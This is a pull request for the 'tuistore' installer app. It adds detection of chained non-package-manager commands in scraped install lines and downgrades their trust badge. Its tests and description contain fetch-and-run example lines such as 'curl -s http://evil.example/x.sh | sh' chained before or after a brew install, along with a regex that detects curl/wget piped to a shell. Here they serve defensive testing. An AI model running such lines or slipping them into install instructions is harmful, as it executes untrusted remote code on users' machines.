### PR TITLE
Stop vouching for install commands that chain a foreign command

### DIFF
--- a/tests/test_command_chain_trust.py
+++ b/tests/test_command_chain_trust.py
@@ -1,0 +1,102 @@
+import unittest
+
+from tuistore import installer
+from tuistore.installer import foreign_segments, make
+from tuistore.scrape import extract_methods
+
+
+class ForeignSegmentTest(unittest.TestCase):
+    def test_manager_only_chain_has_no_foreign_segments(self) -> None:
+        # Real shipped catalog commands — two-step update-then-install
+        # lines must stay green.
+        commands = [
+            "sudo apt update && sudo apt install glow",
+            "brew tap AppachiTech/suvadu && brew install suvadu",
+            "sudo zypper ref && sudo zypper in lazygit",
+            "sudo dnf copr enable atim/gping -y && sudo dnf install gping",
+            "scoop bucket add main && scoop install main/topgrade",
+        ]
+        for command in commands:
+            with self.subTest(command=command):
+                self.assertEqual(foreign_segments(command), [])
+
+    def test_curl_pipe_sh_prefix_is_foreign(self) -> None:
+        self.assertEqual(
+            foreign_segments("curl -s http://evil.example/x.sh | sh && brew install lazygit"),
+            ["curl -s http://evil.example/x.sh", "sh"],
+        )
+
+    def test_trailing_command_after_install_verb_is_foreign(self) -> None:
+        # classify() only ever looked at the text *before* the install
+        # verb; a command chained on *after* it is invisible to that gate
+        # entirely, which is exactly the gap this function closes.
+        self.assertTrue(
+            foreign_segments("brew install lazygit; curl http://evil.example|sh")
+        )
+
+    def test_env_and_sudo_wrappers_are_stripped_before_judging(self) -> None:
+        # Judged on "apt", not on "env"/"sudo".
+        self.assertEqual(foreign_segments("env FOO=1 sudo apt install glow"), [])
+
+    def test_curl_and_git_are_not_treated_as_package_managers(self) -> None:
+        # Catches a future edit that adds "script"/"source" back into the
+        # MANAGER_BINARIES comprehension — their `requires` (curl, git) are
+        # exactly the tools a hostile chained command would use.
+        self.assertNotIn("curl", installer.MANAGER_BINARIES)
+        self.assertNotIn("git", installer.MANAGER_BINARIES)
+
+
+class ChainedCommandTrustTest(unittest.TestCase):
+    def test_readme_method_with_foreign_chain_is_not_community(self) -> None:
+        m = make(
+            "brew",
+            "curl -s http://evil.example/x.sh | sh && brew install lazygit",
+            source="readme",
+        )
+        self.assertEqual(m.trust, "unverified")
+
+    def test_official_method_with_foreign_chain_is_not_verified(self) -> None:
+        # A maintainer-curated row is not a licence to chain arbitrary shell.
+        m = make(
+            "brew",
+            "curl -s http://evil.example/x.sh | sh && brew install lazygit",
+            source="official",
+        )
+        self.assertEqual(m.trust, "unverified")
+
+    def test_clean_readme_method_stays_community(self) -> None:
+        m = make("apt", "sudo apt update && sudo apt install glow", source="readme")
+        self.assertEqual(m.trust, "community")
+        self.assertEqual(m.foreign_commands, [])
+
+    def test_script_kind_keeps_its_own_warning_and_trust(self) -> None:
+        # Already covered by the louder remote-script banner — must not be
+        # double-flagged.
+        m = make(
+            "script",
+            "curl -fsSL https://starship.rs/install.sh | sh",
+            source="readme",
+        )
+        self.assertEqual(m.foreign_commands, [])
+        self.assertTrue(m.is_script)
+        self.assertEqual(m.trust, "community")
+
+    def test_source_clone_is_not_flagged(self) -> None:
+        m = make("source", "git clone https://github.com/a/b && cd b")
+        self.assertEqual(m.foreign_commands, [])
+
+    def test_scraped_attack_line_is_flagged_end_to_end(self) -> None:
+        readme = """```sh
+curl -s http://evil.example/x.sh | sh && brew install lazygit
+```"""
+        methods = extract_methods(readme, "https://github.com/jesseduffield/lazygit")
+
+        self.assertEqual(len(methods), 1)
+        method = methods[0]
+        self.assertEqual(method.kind, "brew")
+        self.assertEqual(method.trust, "unverified")
+        self.assertTrue(method.foreign_commands)
+
+
+if __name__ == "__main__":
+    unittest.main()

--- a/tuistore/__main__.py
+++ b/tuistore/__main__.py
@@ -122,6 +122,8 @@ def _install_one(name: str, *, yes: bool, dry_run: bool, method_kind: str | None
              "unverified": "⚠ unverified — guessed"}[chosen.trust]
     if chosen.is_script:
         trust = "⚠ remote install script — review it"
+    elif chosen.foreign_commands:
+        trust = f"⚠ also runs `{chosen.foreign_commands[0]}` — read the whole line"
     print(f"{entry.name}  ({entry.slug})" + ("  · reinstall" if force else ""))
     print(f"  {cmd}")
     print(f"  via {chosen.label} · {trust}")

--- a/tuistore/app.py
+++ b/tuistore/app.py
@@ -199,6 +199,14 @@ class InstallModal(ModalScreen):
             tb.append("⚠  ", style=f"bold {p.peach}")
             tb.append("this runs a remote install script — ", style=p.peach)
             tb.append("read it before you run it", style=f"bold {p.peach}")
+        elif m.foreign_commands:
+            # The line classifies as an installer but also runs something we
+            # can't vouch for — name it rather than showing a green check.
+            warn = True
+            tb.append("⚠  ", style=f"bold {p.peach}")
+            tb.append("also runs ", style=p.peach)
+            tb.append(f"`{m.foreign_commands[0]}`", style=f"bold {p.peach}")
+            tb.append(" — read the whole line before you run it", style=p.peach)
         elif m.trust == "unverified":
             warn = True
             tb.append("⚠  ", style=f"bold {p.peach}")

--- a/tuistore/installer.py
+++ b/tuistore/installer.py
@@ -101,8 +101,11 @@ class Method:
         """How much to trust this command:
         - "verified"   maintainer-curated (featured tools)
         - "community"  taken verbatim from the project's own README
-        - "unverified" guessed from the repo (name may be wrong / squattable)
+        - "unverified" guessed from the repo (name may be wrong / squattable),
+                       or the line chains a command we can't vouch for
         """
+        if self.foreign_commands:
+            return "unverified"
         if self.source == "official":
             return "verified"
         if self.source == "readme":
@@ -113,6 +116,16 @@ class Method:
     def is_script(self) -> bool:
         """A remote install script (curl|sh) — highest-risk, always warn."""
         return self.kind == "script"
+
+    @property
+    def foreign_commands(self) -> list[str]:
+        """Chained sub-commands this method runs that aren't package-manager
+        calls. Empty for `script` (already carries its own loud warning) and
+        `source` (a `git clone && cd` is the honest, self-generated fallback,
+        not a scraped surprise)."""
+        if self.kind in ("script", "source", "manual"):
+            return []
+        return foreign_segments(self.command)
 
     @property
     def is_bare_clone(self) -> bool:
@@ -259,6 +272,49 @@ _CLASSIFY = [
     ("script", re.compile(r"\bcurl\b.*\|\s*(?:sudo\s+)?(?:sh|bash)\b|\bwget\b.*\|\s*(?:sudo\s+)?(?:sh|bash)\b")),
     ("script", re.compile(r"(?i)\b(?:iwr|invoke-webrequest)\b.*\|\s*(?:iex|invoke-expression)\b")),
 ]
+
+
+# ── chained-command detection ──────────────────────────────────────────────
+# The binaries that may legitimately appear in an install command's chain.
+# Derived from the KINDS table so it stays in sync automatically. "script"
+# and "source" are excluded on purpose: their `requires` are curl and git,
+# which are exactly the tools a hostile chained command would use.
+MANAGER_BINARIES: frozenset[str] = frozenset(
+    binary
+    for kind, meta in KINDS.items()
+    if kind not in ("script", "source", "manual")
+    for binary in meta.get("requires", [])
+) | frozenset({"apt-get", "nala", "nix-env", "pip", "python", "python3"})
+
+# Shell operators that start a new command within one line.
+_CHAIN_SPLIT = re.compile(r"&&|\|\||\||;|\n")
+# The same wrapper tokens `_CMD_PREFIX` tolerates, stripped from one segment
+# so `sudo apt update` is judged on "apt", not on "sudo".
+_SEGMENT_PREFIX = re.compile(
+    r"^(?:(?:sudo|doas|env)(?:\s+-\S+)*\s+|"
+    r"[A-Za-z_][A-Za-z0-9_]*=(?:'[^']*'|\"[^\"]*\"|\S+)\s+|arch\s+-\S+\s+)*"
+)
+
+
+def foreign_segments(command: str) -> list[str]:
+    """Chained sub-commands that are not package-manager invocations.
+
+    `classify()` only inspects the install verb; it deliberately tolerates a
+    prior chained command so that real two-step lines ("apt update && apt
+    install x") keep working. That tolerance means a scraped README line can
+    also carry something entirely unrelated — "curl … | sh && brew install x"
+    classifies as `brew` — and the trust badge would otherwise vouch for it.
+    Anything here means: show the command, but do not vouch for it.
+    """
+    out: list[str] = []
+    for raw in _CHAIN_SPLIT.split(command):
+        segment = raw.strip()
+        if not segment:
+            continue
+        words = _SEGMENT_PREFIX.sub("", segment).split()
+        if not words or words[0] not in MANAGER_BINARIES:
+            out.append(segment)
+    return out
 
 
 # leading tokens allowed *before* the install verb on a real command line:


### PR DESCRIPTION
**TL;DR** — a README line like `curl evil.sh | sh && brew install lazygit` currently earns the green **"✓ from the project's own README"** badge. This makes it show ⚠ instead. Display/trust only: nothing is blocked, scraping and classification are untouched.

### Before / after

| Install command | Before | After |
|---|---|---|
| `sudo apt update && sudo apt install glow` | ✓ community | ✓ community *(unchanged)* |
| `curl evil.sh \| sh && brew install lazygit` | **✓ community** | ⚠ unverified, names `curl evil.sh` |
| `brew install x; curl evil.sh \| sh` | **✓ community** | ⚠ unverified |

### Why it happens

`classify()` only inspects the install *verb*. `_CMD_PREFIX` deliberately tolerates a chained command *before* it so real two-step lines keep working — and nothing at all looks at what comes *after*. Commands are scraped from ~800 third-party READMEs, so any of those repos (or anyone who compromises one) can plant this.

Not silent execution — the full command is still displayed and confirmed before it runs. The bug is that the app *vouches* for it, which inverts the exact guarantee the badge exists to make.

### The change — 4 files, +169/−1

- **`installer.py`** — new `foreign_segments()`: splits on `&&`, `||`, `|`, `;`, newline; strips the same `sudo` / `doas` / `env` / `VAR=val` / `arch -arm64` wrappers `_CMD_PREFIX` already tolerates; reports any segment whose first word isn't a package-manager binary. `MANAGER_BINARIES` is derived from the existing `KINDS` table so it stays in sync.
- **`installer.py`** — `Method.foreign_commands` exposes it; `Method.trust` returns `"unverified"` when it's non-empty.
- **`app.py`** / **`__main__.py`** — the TUI banner and CLI trust line name the offending segment. The detail pane and `tuistore info` pick the downgrade up for free, since they already key off `Method.trust`.
- **`tests/test_command_chain_trust.py`** — new, 11 cases.

### Deliberately not changed

- **`classify()`, `_CMD_PREFIX`, `_CLASSIFY`, the scraper.** Tightening those would drop legitimate two-step install lines the catalog depends on, and `tests/test_scrape.py` pins that behavior on purpose. The same lines still scrape and classify identically — they just stop being vouched for.
- **`script` and `source` kinds are exempt.** A remote install script already carries its own louder warning, and a `git clone && cd` is the self-generated fallback, not a scraped surprise.
- **Ranking.** `Method.score` keys off `source`, not `trust`, so no method changes position.

### Catalog impact: exactly 1 entry

**k9s / `apt`** — `wget …/k9s_linux_amd64.deb && sudo apt install ./k9s_linux_amd64.deb && rm k9s_linux_amd64.deb`. It downloads a remote `.deb` and `sudo apt install`s it, so warning on it is the intended behavior.

### Tests

203 passing; no existing test modified or deleted. The new file covers: shipped two-step manager chains stay clean, the `curl | sh &&` prefix and a trailing `; curl | sh` are both caught, wrappers are stripped before judging, `script`/`source` stay exempt, `official` rows are downgraded too, and one end-to-end case feeds an attack line through `scrape.extract_methods` and asserts it comes back `kind == "brew"` (scraping unchanged) with `trust == "unverified"`.

One test asserts `curl` and `git` are **not** in `MANAGER_BINARIES` — the guard against a future edit adding `script`/`source` back into the comprehension and springing a leak in the gate.
